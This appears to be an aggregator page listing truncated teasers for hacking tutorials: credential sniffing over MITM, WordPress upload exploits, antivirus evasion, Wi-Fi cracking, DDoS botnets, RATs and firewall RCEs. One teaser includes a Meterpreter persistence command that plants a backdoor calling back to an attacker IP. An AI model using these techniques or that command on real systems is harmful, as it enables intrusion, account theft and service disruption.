Quantcast
Browsing all 1812 articles
Browse latest View live

Image may be NSFW.
Clik here to view.

Hack Gmail and Facebook Password in Network using Bettercap

Note: In my case this trick works for only Internet Explorer usersBettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive...

View Article


Image may be NSFW.
Clik here to view.

Hack Wordpress Server using Wordpress SlideShow Gallery Authenticated File...

The Wordpress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload...

View Article


Image may be NSFW.
Clik here to view.

Hacking Wordpress using Ninja Forms Unauthenticated File Upload

Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web...

View Article

Image may be NSFW.
Clik here to view.

Penetration Testing in Wordpress Website using Wordpress Exploit Framework

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systemsfirst clone WPXF repository from github, to do so...

View Article

Image may be NSFW.
Clik here to view.

Hack Remote PC with Reverse PowerShell using Brosec

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec...

View Article


Image may be NSFW.
Clik here to view.

Bypass All Antivirus and Hack Remote Windows 10 PC using Hercules

HERCULES is a special payload generator that can bypass all antivirus software.First clone Herculesrepository from github, to do so type:https://github.com/EgeBalci/HERCULES.gitNow Open kali linux...

View Article

Image may be NSFW.
Clik here to view.

Hack your Network through Android Phone using cSploit

First download the CSploit from here and install in your android phoneNow open your cSploit and select your network and select the target IP which you want to hack.Now select MITM option, see the...

View Article

Image may be NSFW.
Clik here to view.

Exploiting OS Command Injection in Web Application using Commix

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos that can be used from web developers, penetration testers or even security researchers in...

View Article


Image may be NSFW.
Clik here to view.

Hack Remote PC using BrowserBackdoor - JavaScript WebSocket Backdoor

BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket...

View Article


Image may be NSFW.
Clik here to view.

Automating Exploitation of Remote PC using Metasploithelper

Metasploit contains port-based modules as well as URI-based modules (web servers). This tool bridges Nmap XML file with Metasploit and generates a resource script containing matching Metasploit...

View Article

Image may be NSFW.
Clik here to view.

How to Create Botnet for D-Dos Attack with UFONet

Remember: this tool is NOT for educational purpose.  Usage of UFONet for attacking targets without prior mutual consent is illegal.   It is the end user's responsibility to obey all applicable local,...

View Article

Image may be NSFW.
Clik here to view.

Hack Wireless Network using Airgeddon

Airgeddon is a multi-use bash script for Linux systems to audit wireless networks.Features·         Interface mode switcher (Monitor-Managed).·         DoS over wireless networks with different...

View Article

Image may be NSFW.
Clik here to view.

Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack)

Fluxion is a remake of linset by vk439 with less bugs and more features. It's compatible with the latest release of Kali (Rolling).How it works·         Scan the networks.·         Capture a handshake...

View Article


Image may be NSFW.
Clik here to view.

Cracking Wifi Password using Fern WIFi Cracker

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover...

View Article

Image may be NSFW.
Clik here to view.

Detect Hacker in Network using Android Phone

HosTaGe is a mobile honeypot that detects attacks on wireless networks.First of all search for HosTaGe honeypot on android play store.Now click on the above shown app and install it.Now for testing i...

View Article


Image may be NSFW.
Clik here to view.

Exploitation in Linux Firewall using IPFire proxy.cgi RCE

IPFire, a free linux based open source firewall distribution, version < 2.19 Update Core 101 contains remote command execution vulnerability in the proxy.cgi page.Exploit TargetsIpfire...

View Article

Image may be NSFW.
Clik here to view.

5 ways to Create Permanent Backdoor in Remote PC

First take the meterpreter shell from any known exploit and bypass UAC for better results .Then   run command:persistencerun persistence –X –i 10 –p 443 –r 192.168.0.105-X=connect back when the system...

View Article


Image may be NSFW.
Clik here to view.

HTTP RAT Tutorial for Beginners

HTTP RAT is a kind of Remote Access Trojan which utilizes web interfaces and port 80 to gain access. It can be understood simply as a HTTP Tunnel, except it works in the reverse direction. These...

View Article

Image may be NSFW.
Clik here to view.

Exploit Linux PC using IPFire Bash Environment Variable Injection (Shellshock)

IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request...

View Article

Image may be NSFW.
Clik here to view.

5 Ways to Surf Internet Anonymously in Android Phone

Proxy is the most trending and one of the most effective ways which hackers use to hide their IP address, allowing them to mask the actual source of attack by impersonating a fake source address of...

View Article
Browsing all 1812 articles
Browse latest View live